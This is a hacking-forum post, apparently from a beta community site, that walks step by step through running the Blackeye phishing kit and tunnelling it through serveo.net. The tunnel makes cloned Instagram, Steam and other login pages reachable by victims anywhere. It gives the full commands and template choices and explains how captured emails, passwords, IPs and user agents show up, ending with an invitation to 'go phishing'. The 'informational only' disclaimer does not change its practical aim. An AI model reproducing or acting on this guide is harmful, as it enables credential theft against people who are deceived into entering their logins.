• We just launched and are currently in beta. Join us as we build and grow the community.

Blackeye phishing- How to use with serveo.net

IceVille12

Static Analysis Expert
I Rep
0
0
0
Rep
0
I Vouches
0
0
0
Vouches
0
Posts
186
Likes
185
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 200 XP
Hi, here i have written a small, but powerfull blackeye tutorial. The program is using the network ip (e.g. 192.168.0.1) by default. So you can only phish victims in your network. I will show you, how to use the serveo.net service, so you can send the adress to everyone you want, doesn't matter the vic is in your network or not.
WARNING:
THIS IS FOR INFORMATIONAL AND LEARNING PURPOSE ONLY!
Lets start:
First of all we use a Linux Machine like KaliOS or ParrotOS. My system is a ParrotOS.
Now we have to clone the Git Repo to our machine. We use the following command ind the terminal (shortcut: win+t)
Code:
git clone
You must upgrade your account or reply in the thread to view the hidden content.
Sometimes you need the permission to clone. If so, use
Code:
sudo git clone
You must upgrade your account or reply in the thread to view the hidden content.
After we have cloned the blackeye repo, we have to go into the blackeye folder. Use:
Code:
cd blackeye
and run the tool with:
Code:
bash blackeye.sh
or with sudo rights:
Code:
sudo bash blackeye.sh
Leave the blackeye terminal open and open a new terminal with win+t and start the serveo service with the following command:
Code:
ssh -R name:80:localhost:8080 serveo.net
Replace the "name" with your wanted domain name. I will use instagram for example. My code looks like:
Code:
ssh -R instagram:80:localhost:8080 serveo.net
Important is, that we have only 3 spaces in the line. The first between ssh and -R, second between -R and instagram:80:localhost:8080 and the last one between instagram80:localhost:8080 and serveo.net!
You will see a message like:
The authenticity of host 'serveo.net (159.89.*.*)' can't be established.
RSA key fingerprint is SHA256:07jcXlJ4SkBnyTmaVnmTpXuBiRx2XXX.
Are you sure you want to continue connecting (yes/no)?
Type yes and hit the enter button.
Now you will get a warning message like:
Warning: Permanently added 'serveo.net,159.89.*.*' (RSA) to the list of known hosts.
Hi there
Forwarding HTTP traffic from https://instagram.serveo.net
Press g to start a GUI session and ctrl-c to quit.
Important: Don't hit ctrl-c!
We leave the terminal open and swith to the blackeye terminal that we opened at beginning.
Now we see blackeye running.
Use the template, you want to phish with the number on the left of the name e.g: 11 for Steam or 1 for Instagram
We will use instagram in this tut, so i hit the number 1 and press enter.
Now blackeye ask us for the local ip. We enter the following ip and port:
Code:
127.0.0.1:8080
and hit enter again.
You will see something happen in the terminal. Blackeye is starting the server and show us the victim link (127.0.0.1:8080), that we have to send to the victim. But STOP! Don't close the terminal and don't send the ip, that blackeye give us. Send the link, we have createt in the second terminal with serveo.
In our example we use the:
Code:
adress. If the victim (or you) visit the given link, you will see the serveo terminal print some text like: HTTP request from 217.228.*.* to https://instagram.serveo.net/login.php
That show you, that the script is working.
Test the phishing script and type an email and a password into the login window in your browser and try to login.
Now look back to the blackeye terminal "et voila!" you will see your typed email and password there with other useful informations like User-Agent, IP Country and other informations. When someone traped, blackeye will stop the service and you have to run the blackeye part again. The serveo service will work until you close it with ctrl+c.
Here the short version of the tutorial:
Step 1:
Blackeye terminal:
ctrl+t
type: git clone
You must upgrade your account or reply in the thread to view the hidden content.
//hit enter
Step 2:
type: cd blackeye //hit enter
Step 3:
type: bash blackeye.sh //hit enter
Step 4:
Serveo terminal:
ctrl+t
type: ssh -R name:80:localhost:8080 serveo.net //hit enter
type: yes //hit enter
Step 5:
got to Blackeye terminal and choose between 1 and 33 hit enter
type: 127.0.0.1:8080 //hit enter
Step 6:
send instagram.serveo.net to victim wait and look to the blackeye terminal.
Repeat step 3, 5 and 6 after every victim.
When you close all windows, repeat every step between 2 and 6.
I hope you understand that tut, it's my first one Sleepy2 Blush
And now go phishing xD Evil
 

452,292

324,156

324,164

Top